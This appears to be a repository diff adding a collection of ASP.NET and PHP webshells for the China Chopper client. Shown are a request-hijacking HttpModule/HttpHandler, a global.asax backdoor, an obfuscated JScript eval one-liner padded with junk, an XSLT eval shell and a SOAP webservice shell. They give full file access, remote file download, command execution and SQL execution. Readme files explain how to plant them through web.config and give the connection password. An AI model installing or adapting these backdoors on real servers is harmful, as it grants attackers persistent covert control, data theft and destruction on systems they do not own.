+                                foreach (FileInfo D in m.GetFiles())
+                                {
+                                    R += string.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
+                                }
+                                break;
+                            }
+                        case "C":
+                            {
+                                StreamReader m = new StreamReader(Z1, Encoding.Default);
+                                R = m.ReadToEnd();
+                                m.Close();
+                                break;
+                            }
+                        case "D":
+                            {
+                                StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);
+                                m.Write(Z2);
+                                R = "1";
+                                m.Close();
+                                break;
+                            }
+                        case "E":
+                            {
+                                if (Directory.Exists(Z1))
+                                    Directory.Delete(Z1, true);
+                                else
+                                    File.Delete(Z1);
+                                R = "1";
+                                break;
+                            }
+                        case "F":
+                            {
+                                response.Clear();
+                                response.Write("\x2D\x3E\x7C");
+                                response.WriteFile(Z1);
+                                response.Write("\x7C\x3C\x2D");
+                                goto End;
+                            }
+                        case "G":
+                            {
+                                byte[] B = new byte[Z2.Length / 2];
+                                for (int i = 0; i < Z2.Length; i += 2)
+                                {
+                                    B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16);
+                                }
+                                FileStream fs = new FileStream(Z1, FileMode.Create);
+                                fs.Write(B, 0, B.Length);
+                                fs.Close();
+                                R = "1";
+                                break;
+                            }
+                        case "H":
+                            {
+                                CP(Z1, Z2); R = "1";
+                                break;
+                            }
+                        case "I":
+                            {
+                                if (Directory.Exists(Z1))
+                                {
+                                    Directory.Move(Z1, Z2);
+                                }
+                                else
+                                {
+                                    File.Move(Z1, Z2);
+                                }
+                                break;
+                            }
+                        case "J":
+                            {
+                                Directory.CreateDirectory(Z1);
+                                R = "1";
+                                break;
+                            }
+                        case "K":
+                            {
+                                DateTime TM = Convert.ToDateTime(Z2);
+                                if (Directory.Exists(Z1))
+                                {
+                                    Directory.SetCreationTime(Z1, TM);
+                                    Directory.SetLastWriteTime(Z1, TM);
+                                    Directory.SetLastAccessTime(Z1, TM);
+                                }
+                                else
+                                {
+                                    File.SetCreationTime(Z1, TM);
+                                    File.SetLastWriteTime(Z1, TM);
+                                    File.SetLastAccessTime(Z1, TM);
+                                }
+                                R = "1";
+                                break;
+                            }
+                        case "L":
+                            {
+                                HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1));
+                                RQ.Method = "GET";
+                                RQ.ContentType = "application/x-www-form-urlencoded";
+                                HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();
+                                Stream WF = WB.GetResponseStream();
+                                FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write);
+                                int i;
+                                byte[] buffer = new byte[1024];
+                                while (true)
+                                {
+                                    i = WF.Read(buffer, 0, buffer.Length);
+                                    if (i < 1) break; FS.Write(buffer, 0, i);
+                                }
+                                WF.Close();
+                                WB.Close();
+                                FS.Close();
+                                R = "1";
+                                break;
+                            }
+                        case "M":
+                            {
+                                System.Diagnostics.ProcessStartInfo c = new System.Diagnostics.ProcessStartInfo(Z1.Substring(2));
+                                System.Diagnostics.Process e = new System.Diagnostics.Process();
+                                System.IO.StreamReader OT, ER;
+                                c.UseShellExecute = false;
+                                c.RedirectStandardOutput = true;
+                                c.RedirectStandardError = true;
+                                e.StartInfo = c;
+                                c.Arguments = string.Format("{0} {1}", Z1.Substring(0, 2), Z2);
+                                e.Start();
+                                OT = e.StandardOutput;
+                                ER = e.StandardError;
+                                e.Close();
+                                R = OT.ReadToEnd() + ER.ReadToEnd();
+                                break;
+                            }
+                        case "N":
+                            {
+                                String strDat = Z1.ToUpper();
+                                SqlConnection Conn = new SqlConnection(Z1);
+                                Conn.Open();
+                                R = Conn.Database + "\t";
+                                Conn.Close();
+                                break;
+                            }
+                        case "O":
+                            {
+                                String[] x = Z1.Replace("\r", "").Split('\n');
+                                String strConn = x[0], strDb = x[1];
+                                SqlConnection Conn = new SqlConnection(strConn);
+                                Conn.Open();
+                                DataTable dt = Conn.GetSchema("Columns");
+                                Conn.Close();
+                                for (int i = 0; i < dt.Rows.Count; i++)
+                                {
+                                    R += String.Format("{0}\t", dt.Rows[i][2].ToString());
+                                }
+                                break;
+                            }
+                        case "P":
+                            {
+                                String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];
+                                String strConn = x[0], strDb = x[1], strTable = x[2];
+                                p[0] = strDb;
+                                p[2] = strTable;
+                                SqlConnection Conn = new SqlConnection(strConn);
+                                Conn.Open();
+                                DataTable dt = Conn.GetSchema("Columns", p);
+                                Conn.Close();
+                                for (int i = 0; i < dt.Rows.Count; i++)
+                                {
+                                    R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());
+                                }
+                                break;
+                            }
+                        case "Q":
+                            {
+                                String[] x = Z1.Replace("\r", "").Split('\n');
+                                String strDat, strConn = x[0], strDb = x[1];
+                                int i, c;
+                                strDat = Z2.ToUpper();
+                                SqlConnection Conn = new SqlConnection(strConn);
+                                Conn.Open();
+                                if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)
+                                {
+                                    SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn);
+                                    DataSet ds = new DataSet(); OD.Fill(ds);
+                                    if (ds.Tables.Count > 0)
+                                    {
+                                        DataRowCollection rows = ds.Tables[0].Rows;
+                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                        {
+                                            R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());
+                                        }
+                                        R += "\r\n"; for (i = 0; i < rows.Count; i++)
+                                        {
+                                            for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                            {
+                                                R += String.Format("{0}\t|\t", rows[i][c].ToString());
+                                            }
+                                            R += "\r\n";
+                                        }
+                                    }
+                                    ds.Clear();
+                                    ds.Dispose();
+                                }
+                                else
+                                {
+                                    SqlCommand cm = Conn.CreateCommand();
+                                    cm.CommandText = Z2;
+                                    cm.ExecuteNonQuery();
+                                    R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";
+                                }
+                                Conn.Close();
+                                break;
+                            }
+                        default:
+                            goto End;
+                    }
+                }
+                catch (Exception E)
+                {
+                    R = "ERROR:// " + E.Message;
+                }
+                response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D");
+            End: ;
+            }
+            response.End();
+        }
+    }
+ 
+    public class CustomizeHttpHandler : IHttpHandler
+    {
+        public bool IsReusable
+        {
+            get
+            {
+                return true;
+            }
+        }
+ 
+        public void ProcessRequest(HttpContext context)
+        {
+            Customize.Request();
+        }
+    }
+ 
+    public class CustomizeHttpModule : IHttpModule
+    {
+ 
+        #region IHttpModule 成员
+ 
+        public void Dispose()
+        {
+ 
+        }
+ 
+        public void Init(HttpApplication context)
+        {
+            context.BeginRequest += new EventHandler(context_BeginRequest);
+        }
+ 
+        void context_BeginRequest(object sender, EventArgs e)
+        {
+            Customize.Request();
+        }
+ 
+        #endregion
+    }
+ 
+}

aspx/httpHandlers_backdoor/global.asax

@@ -0,0 +1,324 @@
+<%@ Application Language="C#" %>
+ 
+<script RunAt='server'>
+ 
+    void Application_Start(object sender, EventArgs e)
+    {
+        //在应用程序启动时运行的代码
+ 
+    }
+ 
+    void Application_End(object sender, EventArgs e)
+    {
+        //在应用程序关闭时运行的代码
+ 
+    }
+ 
+    void Application_Error(object sender, EventArgs e)
+    {
+ 
+ 
+    }
+ 
+    void Session_Start(object sender, EventArgs e)
+    {
+        //在新会话启动时运行的代码
+ 
+    }
+ 
+    void Session_End(object sender, EventArgs e)
+    {
+        //在会话结束时运行的代码。 
+        // 注意: 只有在 Web.config 文件中的 sessionstate 模式设置为
+        // InProc 时，才会引发 Session_End 事件。如果会话模式 
+        //设置为 StateServer 或 SQLServer，则不会引发该事件。
+ 
+    }
+ 
+    void CP(string S, string D)
+    {
+        if (System.IO.Directory.Exists(S))
+        {
+            System.IO.DirectoryInfo m = new System.IO.DirectoryInfo(S);
+            System.IO.Directory.CreateDirectory(D);
+            foreach (System.IO.FileInfo F in m.GetFiles())
+            {
+                System.IO.File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
+            }
+            foreach (System.IO.DirectoryInfo F in m.GetDirectories())
+            {
+                CP(S + "\\" + F.Name, D + "\\" + F.Name);
+            }
+        }
+        else
+        {
+            System.IO.File.Copy(S, D);
+        }
+    }
+ 
+    void EvalRequest(string action)
+    {
+        HttpContext context = HttpContext.Current;
+        HttpRequest request = context.Request;
+        HttpResponse response = context.Response;
+ 
+        string Z = action;
+        if (Z != "")
+        {
+            string Z1 = request.Form["Z1"];
+            string Z2 = request.Form["Z2"];
+            string R = "";
+            try
+            {
+                switch (Z)
+                {
+                    case "A":
+                        {
+                            string[] c = System.IO.Directory.GetLogicalDrives();
+                            R = string.Format("{0}\t", context.Server.MapPath("~"));
+                            for (int i = 0; i < c.Length; i++)
+                                R += c[i][0] + ":";
+                            break;
+                        }
+                    case "B":
+                        {
+                            System.IO.DirectoryInfo m = new System.IO.DirectoryInfo(Z1);
+                            foreach (System.IO.DirectoryInfo D in m.GetDirectories())
+                            {
+                                R += string.Format("{0}/\t{1}\t0\t-\n", D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
+                            }
+                            foreach (System.IO.FileInfo D in m.GetFiles())
+                            {
+                                R += string.Format("{0}\t{1}\t{2}\t-\n", D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
+                            }
+                            break;
+                        }
+                    case "C":
+                        {
+                            System.IO.StreamReader m = new System.IO.StreamReader(Z1, Encoding.Default);
+                            R = m.ReadToEnd();
+                            m.Close();
+                            break;
+                        }
+                    case "D":
+                        {
+                            System.IO.StreamWriter m = new System.IO.StreamWriter(Z1, false, Encoding.Default);
+                            m.Write(Z2);
+                            R = "1";
+                            m.Close();
+                            break;
+                        }
+                    case "E":
+                        {
+                            if (System.IO.Directory.Exists(Z1))
+                                System.IO.Directory.Delete(Z1, true);
+                            else
+                                System.IO.File.Delete(Z1);
+                            R = "1";
+                            break;
+                        }
+                    case "F":
+                        {
+                            response.Clear();
+                            response.Write("\x2D\x3E\x7C");
+                            response.WriteFile(Z1);
+                            response.Write("\x7C\x3C\x2D");
+                            goto End;
+                        }
+                    case "G":
+                        {
+                            byte[] B = new byte[Z2.Length / 2];
+                            for (int i = 0; i < Z2.Length; i += 2)
+                            {
+                                B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16);
+                            }
+                            System.IO.FileStream fs = new System.IO.FileStream(Z1, System.IO.FileMode.Create);
+                            fs.Write(B, 0, B.Length);
+                            fs.Close();
+                            R = "1";
+                            break;
+                        }
+                    case "H":
+                        {
+                            CP(Z1, Z2);
+                            R = "1";
+                            break;
+                        }
+                    case "I":
+                        {
+                            if (System.IO.Directory.Exists(Z1))
+                            {
+                                System.IO.Directory.Move(Z1, Z2);
+                            }
+                            else
+                            {
+                                System.IO.File.Move(Z1, Z2);
+                            }
+                            break;
+                        }
+                    case "J":
+                        {
+                            System.IO.Directory.CreateDirectory(Z1);
+                            R = "1";
+                            break;
+                        }
+                    case "K":
+                        {
+                            DateTime TM = Convert.ToDateTime(Z2);
+                            if (System.IO.Directory.Exists(Z1))
+                            {
+                                System.IO.Directory.SetCreationTime(Z1, TM);
+                                System.IO.Directory.SetLastWriteTime(Z1, TM);
+                                System.IO.Directory.SetLastAccessTime(Z1, TM);
+                            }
+                            else
+                            {
+                                System.IO.File.SetCreationTime(Z1, TM);
+                                System.IO.File.SetLastWriteTime(Z1, TM);
+                                System.IO.File.SetLastAccessTime(Z1, TM);
+                            }
+                            R = "1";
+                            break;
+                        }
+                    case "L":
+                        {
+                            System.Net.HttpWebRequest RQ = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(new Uri(Z1));
+                            RQ.Method = "GET";
+                            RQ.ContentType = "application/x-www-form-urlencoded";
+                            System.Net.HttpWebResponse WB = (System.Net.HttpWebResponse)RQ.GetResponse();
+                            System.IO.Stream WF = WB.GetResponseStream();
+                            System.IO.FileStream FS = new System.IO.FileStream(Z2, System.IO.FileMode.Create, System.IO.FileAccess.Write);
+                            int i;
+                            byte[] buffer = new byte[1024];
+                            while (true)
+                            {
+                                i = WF.Read(buffer, 0, buffer.Length);
+                                if (i < 1) break; FS.Write(buffer, 0, i);
+                            }
+                            WF.Close();
+                            WB.Close();
+                            FS.Close();
+                            R = "1";
+                            break;
+                        }
+                    case "M":
+                        {
+                            System.Diagnostics.ProcessStartInfo c = new System.Diagnostics.ProcessStartInfo(Z1.Substring(2));
+                            System.Diagnostics.Process e = new System.Diagnostics.Process();
+                            System.IO.StreamReader OT, ER;
+                            c.UseShellExecute = false;
+                            c.RedirectStandardOutput = true;
+                            c.RedirectStandardError = true;
+                            e.StartInfo = c;
+                            c.Arguments = string.Format("{0} {1}", Z1.Substring(0, 2), Z2);
+                            e.Start(); OT = e.StandardOutput;
+                            ER = e.StandardError;
+                            e.Close();
+                            R = OT.ReadToEnd() + ER.ReadToEnd();
+                            break;
+                        }
+                    case "N":
+                        {
+                            String strDat = Z1.ToUpper();
+                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(Z1);
+                            Conn.Open();
+                            R = Conn.Database + "\t";
+                            Conn.Close(); break;
+                        }
+                    case "O":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n');
+                            String strConn = x[0], strDb = x[1];
+                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(strConn);
+                            Conn.Open();
+                            System.Data.DataTable dt = Conn.GetSchema("Columns");
+                            Conn.Close();
+                            for (int i = 0; i < dt.Rows.Count; i++)
+                            {
+                                R += String.Format("{0}\t", dt.Rows[i][2].ToString());
+                            }
+                            break;
+                        }
+                    case "P":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];
+                            String strConn = x[0], strDb = x[1], strTable = x[2]; p[0] = strDb;
+                            p[2] = strTable;
+                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(strConn);
+                            Conn.Open();
+                            System.Data.DataTable dt = Conn.GetSchema("Columns", p);
+                            Conn.Close();
+                            for (int i = 0; i < dt.Rows.Count; i++)
+                            {
+                                R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());
+                            }
+                            break;
+                        }
+                    case "Q":
+                        {
+                            String[] x = Z1.Replace("\r", "").Split('\n');
+                            String strDat, strConn = x[0], strDb = x[1];
+                            int i, c;
+                            strDat = Z2.ToUpper();
+                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(strConn);
+                            Conn.Open();
+                            if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)
+                            {
+                                System.Data.SqlClient.SqlDataAdapter OD = new System.Data.SqlClient.SqlDataAdapter(Z2, Conn);
+                                System.Data.DataSet ds = new System.Data.DataSet();
+                                OD.Fill(ds);
+                                if (ds.Tables.Count > 0)
+                                {
+                                    System.Data.DataRowCollection rows = ds.Tables[0].Rows;
+                                    for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                    {
+                                        R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());
+                                    }
+                                    R += "\r\n";
+                                    for (i = 0; i < rows.Count; i++)
+                                    {
+                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++)
+                                        {
+                                            R += String.Format("{0}\t|\t", rows[i][c].ToString());
+                                        }
+                                        R += "\r\n";
+                                    }
+                                }
+                                ds.Clear();
+                                ds.Dispose();
+                            }
+                            else
+                            {
+                                System.Data.SqlClient.SqlCommand cm = Conn.CreateCommand();
+                                cm.CommandText = Z2;
+                                cm.ExecuteNonQuery();
+                                R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";
+                            }
+                            Conn.Close();
+                            break;
+                        }
+                    default:
+                        goto End;
+                }
+            }
+            catch (Exception E)
+            {
+                R = "ERROR:// " + E.Message;
+            }
+            response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D");
+        End: ;
+        }
+    }
+ 
+    //在接收到一个应用程序请求时触发。对于一个请求来说，它是第一个被触发的事件，请求一般是用户输入的一个页面请求（URL）。
+    void Application_BeginRequest(object sender, EventArgs evt)
+    {
+        string action = Request.Form["023"];
+        if (action != null)
+        {
+            EvalRequest(action);
+            Response.End();
+        }
+    }
+ 
+</script>

aspx/httpHandlers_backdoor/httpHandlers.md

@@ -0,0 +1,16 @@
+修改web.config，添加或者修改httpHandlers:
+
+```
+  <httpHandlers>
+    <add path="*.api" verb="*" type="WooYun.CustomizeHttpHandler"/>
+  </httpHandlers>
+```
+如果已经存在 httpHandlers 则在标签内添加，如果<system.webServer>也有配置httpHandlers那么就配置在<system.webServer>里
+
+但是有一点需要特别注意：<system.webServer>里面一定要配置runAllManagedModulesForAllRequests为true,否会启动报错。
+```
+  <system.webServer>
+    <modules runAllManagedModulesForAllRequests="true" />
+  </system.webServer>
+```
+

aspx/httpHandlers_backdoor/httpModules.md

@@ -0,0 +1,8 @@
+相比修改httpHandlers显然这种办法更加的有效且安全一些。但是一定要把这个httpModule的顺序配置到httpModules的第一个。
+修改web.config，添加或者修改httpHandlers:
+
+```
+<httpModules>
+    <add name="WooYun" type="WooYun.CustomizeHttpModule"/>
+</httpModules>
+```

aspx/httpHandlers_backdoor/readme.md

@@ -0,0 +1,32 @@
+## author:园长
+### url: http://javaweb.org/?p=1755
+
+使用说明
+global.asax是不需要编译的，所以直接忽略。
+
+httpHandlers和httpModules配置方式：
+
+1、自行编译上面的cs文件dll
+
+2、复制dll到bin目录
+
+3、修改上述配置，并仔细检查
+
+或：
+
+1、直接新建个Customize.cs文件
+
+2、复制Customize.cs文件到App_Code目录
+
+3、修改上述配置，并仔细检查
+
+连接：
+
+1、菜刀连接的时候必须选Customize：
+
+2、httpHandlers 可以自己指定后缀，比如你配置了.api请求那么可以  http://xx.com/123456.api  做为shell地址，可能会有不能拦截除aspx的情况
+
+3、httpModules可以随便访问一个只要不是静态文件的链接(比如jpg文件不允许被POST) 可以访问:http://xx.com/123456.xxx  
+
+4、连接密码:023
+

aspx/wooyun2015052301.aspx

@@ -0,0 +1 @@
+<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/116679702/*-/*-*/-/*-/*-*/14254250/*-/*-*/-/*-/*-*/102425454/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/); /*gadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenre*/ %>

aspx/xslt.aspx

@@ -0,0 +1,28 @@
+<%@page language="C#"%>
+<%@ import Namespace="System.IO"%>
+<%@ import Namespace="System.Xml"%>
+<%@ import Namespace="System.Xml.Xsl"%>
+<%
+string xml=@"<?xml version=""1.0""?><root>test</root>";
+string xslt=@"<?xml version='1.0'?>
+<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
+	<msxsl:script language=""JScript"" implements-prefix=""zcg"">
+		<msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
+		<msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
+		<msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
+		<msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
+		<![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
+	</msxsl:script>
+<xsl:template match=""/root"">
+	<xsl:value-of select=""zcg:xml()""/>
+</xsl:template>
+</xsl:stylesheet>";
+XmlDocument xmldoc=new XmlDocument();
+xmldoc.LoadXml(xml);
+XmlDocument xsldoc=new XmlDocument();
+xsldoc.LoadXml(xslt);
+XslCompiledTransform xct=new XslCompiledTransform();
+xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
+xct.Transform(xmldoc,null,new MemoryStream());
+
+%>

caidao-shell/3802.php

@@ -0,0 +1,6 @@
+<?php 
+unset($jkhy,$jk_uid); 
+$jk_uid='3802'; 
+$jkhy=array(); 
+$jkhy[3802]='fexin'; 
+?>

caidao-shell/Customize.soap

@@ -0,0 +1,316 @@
+<%@ WebService Language="C#" Class="Control" %>
+using System;
+using System.Web;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Data;
+using System.Data.SqlClient;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Web.SessionState;
+using System.Web.Services;
+using System.Xml;
+using System.Web.Services.Protocols;
+
+[WebService(Namespace = "http://www.wooyun.org/whitehats/RedFree")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+
+[Serializable]
+public class Control : MarshalByRefObject
+{
+    public Control()
+    {
+         
+    }
+    [WebMethod(Description="Customize Script")]
+    public string Chopper(String z, String z1, String z2, String z3) {
+        String Z = z;
+        String result = "";
+        if (Z != "")
+        {
+            String Z1 = z1;
+            String Z2 = z2;
+            String Z3 = z3;
+            String R = "";
+            try
+            {
+                switch (Z)
+                {
+                    case "A":
+                        {
+                            String[] c = Directory.GetLogicalDrives();
+                            R = String.Format("{0}\t", HttpContext.Current.Server.MapPath("/"));
+                            for (int i = 0; i < c.Length; i++)
+                                R += c[i][0] + ":";
+                            break;
+                        }
+                    case "B":
+                        {
+                            DirectoryInfo m = new DirectoryInfo(Z1);
+                            foreach (DirectoryInfo D in m.GetDirectories())
+                            {
+                                R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
+                            }
+                            foreach (FileInfo D in m.GetFiles())
+                            {
+                                R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
+                            }
+                            break;
+                        }
+                    case "C":
+                        {
+                            StreamReader m = new StreamReader(Z1, Encoding.Default);
+                            R = m.ReadToEnd();
+                            m.Close();
+                            break;
+                        }
+                    case "D":
+                        {
+                            StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);
+                            m.Write(Z2);
+                            R = "1";
+                            m.Close();
+                            break;
+                        }
+                    case "E":
+                        {
+                            if (Directory.Exists(Z1))
+                            {
+                                Directory.Delete(Z1, true);
+                            }
+                            else
+                            {
+                                File.Delete(Z1);
+                            }
+                            R = "1";
+                            break;
+                        }
+                    case "F":
+                        {
+                            result += "\x2D\x3E\x7C";
+                            HttpContext.Current.Response.WriteFile(Z1);
+                            result += "\x7C\x3C\x2D";
+                            return result;
+                        }
+                    case "G":
+                        {
+                            byte[] B=new byte[Z2.Length/2];
+                            for (int i=0;i<Z2.Length;i+=2)
+                            {
+                                B[i/2]=(byte)Convert.ToInt32(Z2.Substring(i,2),16);
+                            }
+                            if (Z3=="0" || Z3==null)
+                            {
+                                FileStream fs=new FileStream(Z1,FileMode.Create);
+                                fs.Write(B,0,B.Length);
+                                fs.Close();
+                            }
+                            else
+                            {
+                                FileStream fs=new FileStream(Z1,FileMode.Append);
+                                fs.Write(B,0,B.Length);
+                                fs.Close();
+                            }
+                            R="1";
+                            break;
+                        }
+                    case "H":
+                        {
+                            CP(Z1, Z2);
+                            R = "1";
+                            break;
+                        }
+                    case "I":
+                        {
+                            if (Directory.Exists(Z1))
+                            {
+                                Directory.Move(Z1, Z2);
+                            }
+                            else
+                            {
+                                File.Move(Z1, Z2);
+                            }
+                            break;
+                        }
+                    case "J":
+                        {
+                            Directory.CreateDirectory(Z1);
+                            R = "1";
+                            break;
+                        }
+                    case "K":
+                        {
+                            DateTime TM = Convert.ToDateTime(Z2);
+                            if (Directory.Exists(Z1))
+                            {
+                                Directory.SetCreationTime(Z1, TM);
+                                Directory.SetLastWriteTime(Z1, TM);
+                                Directory.SetLastAccessTime(Z1, TM);
+                            }
+                            else
+                            {
+                                File.SetCreationTime(Z1, TM);
+                                File.SetLastWriteTime(Z1, TM);
+                                File.SetLastAccessTime(Z1, TM);
+                            }
+                            R = "1";
+                            break;
+                        }
+                    case "L":
+                        {
+                            HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1));
+                            RQ.Method = "GET";
+                            RQ.ContentType = "application/x-www-form-urlencoded";
+                            HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();
+                            Stream WF = WB.GetResponseStream();
+                            FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write);
+                            int i;
+                            byte[] buffer = new byte[1024];
+                            while (true)
+                            {
+                                i = WF.Read(buffer, 0, buffer.Length);
+                                if (i < 1)
+                                {
+                                    break;
+                                }
+                                FS.Write(buffer, 0, i);
+                            }
+                            WF.Close();
+                            WB.Close();
+                            FS.Close();
+                            R = "1";
+                            break;
+                        }
+                    case "M":
+                        {
+                            ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2));
+                            Process e = new Process();
+                            StreamReader OT, ER;
+                            c.UseShellExecute = false;
+                            c.RedirectStandardOutput = true;
+                            c.RedirectStandardError = true;
+                            e.StartInfo = c;
+                            c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2);
+                            e.Start();
+                            OT = e.StandardOutput;
